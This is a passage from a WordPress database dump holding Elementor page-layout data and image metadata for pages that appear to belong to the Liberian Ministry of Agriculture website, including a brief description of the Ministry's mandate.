ocal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(18994,1600,'_thumbnail_id','2782'),(18995,2783,'_elementor_edit_mode','builder'),(18996,2783,'_elementor_template_type','wp-post'),(18997,2783,'_elementor_version','2.7.5'),(18998,2783,'_wp_page_template','default'),(18999,2783,'_elementor_data','[{\"id\":\"42f3301\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e4b6de6\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"a1bb6a5\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"7f350b3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The Ministry of Agriculture (MOA) works to create an enabling environment for a more dynamic and vibrant agricultural sector to ensure sustainable food security and employment opportunities for all Liberians.<\\/p><p><span style=\\\"font-size: 14px;\\\">In addition, MOA ensures that agricultural challenges that impede production are investigated and lasting solutions found, and the farmers are provided with the supportive services and the enabling environment to produce.<\\/span><\\/p><p>The core general areas of responsibility of MOA will likely continue to consist of: agriculture, both smallholder and commercial; plantation crops; fisheries; and livestock.<\\/p><h4>Mandate<\\/h4><p>The Ministry\'s mandate is to develop the agriculture sector in collaboration with other relevant institutions in Liberia.<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b499042\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"e7777d0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"95e395c\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"ecf4b97\",\"elType\":\"widget\",\"settings\":{\"featured_post\":\"\",\"featured_excerpt_trimmed_ending\":\"...\",\"featured_read_more_text\":\"Read More\",\"posts_columns\":\"3\",\"image_size\":\"full\",\"image_position\":\"top\",\"excerpt_length\":20,\"excerpt_trimmed_ending\":\"...\",\"read_more\":\"yes\",\"read_more_text\":\"Read More\",\"show_meta\":\"\",\"show_terms_tax\":\"resource_tag\",\"use_custom_query\":\"true\",\"custom_query\":\"{\\\"post_type\\\":\\\"project_resource\\\",\\\"order\\\":\\\"ASC\\\",\\\"orderby\\\":\\\"date\\\",\\\"posts_per_page\\\":\\\"3\\\",\\\"tag\\\":\\\"moa\\\",\\\"tag_id\\\":\\\"61\\\",\\\"tax_query\\\":{\\\"0\\\":{\\\"taxonomy\\\":\\\"resource_tag\\\",\\\"field\\\":\\\"slug\\\",\\\"terms\\\":[\\\"moa\\\"],\\\"operator\\\":\\\"IN\\\"},\\\"relation\\\":\\\"OR\\\"}}\",\"post_type\":\"project_resource\",\"all_btn_label\":\"All\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c0fd7af\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c9198db\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"post_title_color\":\"#000000\",\"post_title_typography_typography\":\"custom\",\"post_title_typography_font_weight\":\"600\",\"post_text_color\":\"#7a7a7a\",\"post_text_typography_typography\":\"custom\",\"post_text_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"post_button_bg_color\":\"#006400\",\"post_button_hover_bg_color\":\"#014421\",\"arrows_style_popover_toggle\":\"custom\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-listing\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cc19bed\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"7b05689\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"1cf2e8b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"d176b2f\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"color\":\"rgba(122,122,122,0.48)\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"759bc05\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"138bbb1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"bb7acbb\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"daadead\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"855e3aa\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" term=\\\"resource_tag:moa\\\" page_length=\\\"false\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(19000,2783,'_elementor_controls_usage','a:7:{s:11:\"text-editor\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:2;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:1;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:3:{s:10:\"text_color\";i:1;s:21:\"typography_typography\";i:1;s:20:\"typography_font_size\";i:1;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:4;s:15:\"control_percent\";i:0;s:8:\"controls\";a:0:{}}s:7:\"section\";a:3:{s:5:\"count\";i:4;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:16:\"section_parallax\";a:1:{s:24:\"jet_parallax_layout_list\";i:4;}}}}s:7:\"heading\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:3;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_title\";a:1:{s:5:\"title\";i:2;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:5:{s:11:\"title_color\";i:2;s:21:\"typography_typography\";i:2;s:22:\"typography_font_family\";i:2;s:20:\"typography_font_size\";i:2;s:22:\"typography_font_weight\";i:2;}}}}s:22:\"jet-blog-smart-listing\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:7:\"content\";a:3:{s:15:\"section_general\";a:8:{s:13:\"featured_post\";i:1;s:13:\"posts_columns\";i:1;s:10:\"image_size\";i:1;s:14:\"image_position\";i:1;s:14:\"excerpt_length\";i:1;s:9:\"read_more\";i:1;s:9:\"show_meta\";i:1;s:14:\"show_terms_tax\";i:1;}s:13:\"section_query\";a:3:{s:16:\"use_custom_query\";i:1;s:12:\"custom_query\";i:1;s:9:\"post_type\";i:1;}s:21:\"section_custom_fields\";a:2:{s:18:\"title_related_meta\";i:1;s:20:\"content_related_meta\";i:1;}}s:5:\"style\";a:3:{s:18:\"section_post_style\";a:6:{s:16:\"post_title_color\";i:1;s:32:\"post_title_typography_typography\";i:1;s:33:\"post_title_typography_font_weight\";i:1;s:15:\"post_text_color\";i:1;s:31:\"post_text_typography_typography\";i:1;s:30:\"post_text_typography_font_size\";i:1;}s:25:\"section_post_button_style\";a:2:{s:20:\"post_button_bg_color\";i:1;s:26:\"post_button_hover_bg_color\";i:1;}s:25:\"section_pagination_arrows\";a:1:{s:27:\"arrows_style_popover_toggle\";i:1;}}}}s:7:\"divider\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:1:{s:5:\"style\";a:1:{s:21:\"section_divider_style\";a:2:{s:5:\"color\";i:1;s:3:\"gap\";i:1;}}}}s:9:\"shortcode\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:17:\"section_shortcode\";a:1:{s:9:\"shortcode\";i:1;}}}}}'),(19002,2783,'_thumbnail_id','2782'),(19003,2784,'_wp_attached_file','2019/11/featured_agriculture_biodiversity.jpg'),(19004,2784,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:554;s:4:\"file\";s:45:\"2019/11/featured_agriculture_biodiversity.jpg\";s:5:\"sizes\";a:3:{s:6:\"medium\";a:4:{s:4:\"file\";s:45:\"featured_agriculture_biodiversity-300x162.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:162;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:45:\"featured_agriculture_biodiversity-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:45:\"featured_agriculture_biodiversity-768x416.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:416;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(19005,471,'_thumbnail_id','2784'),(19006,480,'_thumbnail_id','2240'),(19007,481,'_jetpack_related_posts_cache','a:1:{s:32:\"089eac97c449e1cc8677319ff6720a8f\";a:2:{s:7:\"expires\";i:1627781188;s:7:\"payload\";a:1:{i:0;a:1:{s:2:\"id\";i:468;}}}}'),(19008,2658,'_jetpack_related_posts_cache','a:1:{s:32:\"a9259a0c5e423c2c0237356780aea305\";a:2:{s:7:\"expires\";i:1628110318;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:1751;}i:1;a:1:{s:2:\"id\";i:1711;}i:2;a:1:{s:2:\"id\";i:2248;}}}}'),(19009,474,'_jetpack_related_posts_cache','a:1:{s:32:\"089eac97c449e1cc8677319ff6720a8f\";a:2:{s:7:\"expires\";i:1629104885;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:468;}i:1;a:1:{s:2:\"id\";i:470;}i:2;a:1:{s:2:\"id\";i:471;}}}}'),(19011,1614,'_jetpack_related_posts_cache','a:1:{s:32:\"387e53bc056fb081449b6ed79a90f200\";a:2:{s:7:\"expires\";i:1629006662;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:1612;}i:1;a:1:{s:2:\"id\";i:1582;}i:2;a:1:{s:2:\"id\";i:2457;}}}}'),(19012,2785,'_wp_page_template','default'),(19013,2785,'_elementor_edit_mode','builder'),(19014,2785,'_elementor_template_type','wp-page'),(19015,2785,'_elementor_version','2.7.5'),(19016,2785,'_elementor_data','[{\"id\":\"4a4ba87\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e90c3c6\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"b400ce2\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"246ae3e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Select a Topic\",\"title_color\":\"rgba(0,0,0,0.99)\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]},\"align\":\"left\",\"typography_font_weight\":\"900\",\"text_shadow_text_shadow\":{\"horizontal\":28,\"vertical\":-30,\"blur\":80,\"color\":\"rgba(0,0,0,0.3)\"}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7962ed9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e90c3c6\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"dc1b17b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"a26f260\",\"elType\":\"widget\",\"settings\":{\"number\":30,\"columns\":\"3\",\"equal_height_cols\":\"true\",\"post_type\":\"related_topic\",\"related_tax\":\"resource_tag\",\"post_ids\":\"467,468,469,470,471,472,473\",\"title_trimmed_ending_text\":\"...\",\"show_excerpt\":\"\",\"show_author\":\"\",\"show_date\":\"\",\"show_comments\":\"\",\"show_more\":\"\",\"more_text\":\"Read More\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"3a6922a\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"66e5294\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"title_color\":\"#ffffff\",\"title_typography_typography\":\"custom\",\"title_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"title_typography_font_weight\":\"900\",\"show_image_as\":\"background\",\"show_terms\":\"yes\",\"show_terms_tax\":\"resource_type\",\"show_meta\":\"\",\"box_border_border\":\"solid\",\"box_border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"1\",\"bottom\":\"1\",\"left\":\"1\",\"isLinked\":true},\"box_border_color\":\"rgba(0,100,0,0.22)\",\"content_bg\":\"rgba(0,0,0,0.22)\",\"content_padding\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"title_alignment\":\"center\",\"title_padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"15\",\"left\":\"0\",\"isLinked\":false},\"title_margin\":{\"unit\":\"px\",\"top\":\"15\",\"right\":\"0\",\"bottom\":\"15\",\"left\":\"0\",\"isLinked\":false},\"terms_link_typography_typography\":\"custom\",\"terms_link_typography_font_size\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"terms_link_typography_font_weight\":\"900\",\"terms_link_bg_color\":\"rgba(110,193,228,0.77)\",\"terms_link_color\":\"rgba(0,0,0,0.5)\",\"_animation\":\"none\",\"animation_duration\":\"slow\",\"_background_background\":\"classic\",\"_element_vertical_align\":\"center\"},\"elements\":[],\"widgetType\":\"jet-posts\"}],\"isInner\":false}],\"isInner\":false}]'),(19020,2786,'_wp_page_template','default'),(19021,2786,'_elementor_edit_mode','builder'),(19022,2786,'_elementor_template_type','wp-page'),(19023,2786,'_elementor_version','2.7.5'),(19024,2786,'_elementor_data','[{\"id\":\"4a4ba87\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e90c3c6\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"b400ce2\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"246ae3e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Select a Topic\",\"title_color\":\"rgba(0,0,0,0.99)\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]},\"align\":\"left\",\"typography_font_weight\":\"900\",\"text_shadow_text_shadow\":{\"horizontal\":28,\"vertical\":-30,\"blur\":80,\"color\":\"rgba(0,0,0,0.3)\"}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7962ed9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e90c3c6\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"dc1b17b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"a26f260\",\"elType\":\"widget\",\"settings\":{\"number\":30,\"columns\":\"3\",\"equal_height_cols\":\"true\",\"post_type\":\"related_topic\",\"related_tax\":\"resource_tag\",\"post_ids\":\"467,468,469,470,471,472,473\",\"title_trimmed_ending_text\":\"...\",\"show_excerpt\":\"\",\"show_author\":\"\",\"show_date\":\"\",\"show_comments\":\"\",\"show_more\":\"\",\"more_text\":\"Read More\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"3a6922a\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"66e5294\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"title_color\":\"#ffffff\",\"title_typography_typography\":\"custom\",\"title_typography_font_size\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]},\"title_typography_font_weight\":\"900\",\"show_image_as\":\"background\",\"show_terms\":\"yes\",\"show_terms_tax\":\"resource_type\",\"show_meta\":\"\",\"box_border_border\":\"solid\",\"box_border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"1\",\"bottom\":\"1\",\"left\":\"1\",\"isLinked\":true},\"box_border_color\":\"rgba(0,100,0,0.22)\",\"content_bg\":\"rgba(0,0,0,0.22)\",\"content_padding\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"title_alignment\":\"center\",\"title_padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"15\",\"left\":\"0\",\"isLinked\":false},\"title_margin\":{\"unit\":\"px\",\"top\":\"15\",\"right\":\"0\",\"bottom\":\"15\",\"left\":\"0\",\"isLinked\":false},\"terms_link_typography_typography\":\"custom\",\"terms_link_typography_font_size\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"terms_link_typography_font_weight\":\"900\",\"terms_link_bg_color\":\"rgba(110,193,228,0.77)\",\"terms_link_color\":\"rgba(0,0,0,0.5)\",\"_animation\":\"none\",\"animation_duration\":\"slow\",\"_background_background\":\"classic\",\"_element_vertical_align\":\"center\"},\"elements\":[],\"widgetType\":\"jet-posts\"}],\"isInner\":false}],\"isInner\":false}]'),(19027,2787,'_wp_page_template','default'),(19028,2787,'_elementor_edit_mode','builder'),(19029,2787,'_elementor_template_type','wp-page'),(19030,2787,'_elementor_version','2.7.5'),(19031,2787,'_elementor_data','[{\"id\":\"4a4ba87\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e90c3c6\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"b400ce2\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"246ae3e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Select a Topic\",\"title_color\":\"rgba(0,0,0,0.99)\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]},\"align\":\"left\",\"typography_font_weight\":\"900\",\"text_shadow_text_shadow\":{\"horizontal\":28,\"vertical\":-30,\"blur\":80,\"color\":\"rgba(0,0,0,0.3)\"}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7962ed9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e90c3c6\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"dc1b17b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"a26f260\",\"elType\":\"widget\",\"settings\":{\"number\":30,\"columns\":\"3\",\"equal_height_cols\":\"true\",\"post_type\":\"related_topic\",\"related_tax\":\"resource_tag\",\"post_ids\":\"467,468,469,470,471,472,473\",\"title_trimmed_ending_text\":\"...\",\"show_excerpt\":\"\",\"show_author\":\"\",\"show_date\":\"\",\"show_comments\":\"\",\"show_more\":\"\",\"more_text\":\"Read More\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"3a6922a\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"66e5294\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"title_color\":\"#ffffff\",\"title_typography_typography\":\"custom\",\"title_typography_font_size\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]},\"title_typography_font_weight\":\"900\",\"show_image_as\":\"background\",\"show_terms\":\"yes\",\"show_terms_tax\":\"resource_type\",\"show_meta\":\"\",\"box_border_border\":\"solid\",\"box_border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"1\",\"bottom\":\"1\",\"left\":\"1\",\"isLinked\":true},\"box_border_color\":\"rgba(0,100,0,0.22)\",\"content_bg\":\"rgba(0,0,0,0.22)\",\"content_padding\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"title_alignment\":\"center\",\"title_padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"15\",\"left\":\"0\",\"isLinked\":false},\"title_margin\":{\"unit\":\"px\",\"top\":\"15\",\"right\":\"0\",\"bottom\":\"15\",\"left\":\"0\",\"isLinked\":false},\"terms_link_typography_typography\":\"custom\",\"terms_link_typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]},\"terms_link_typography_font_weight\":\"900\",\"terms_link_bg_color\":\"rgba(110,193,228,0.77)\",\"terms_link_color\":\"rgba(0,0,0,0.5)\",\"_animation\":\"none\",\"animation_duration\":\"slow\",\"_background_background\":\"classic\",\"_element_vertical_align\":\"center\"},\"elements\":[],\"widgetType\":\"jet-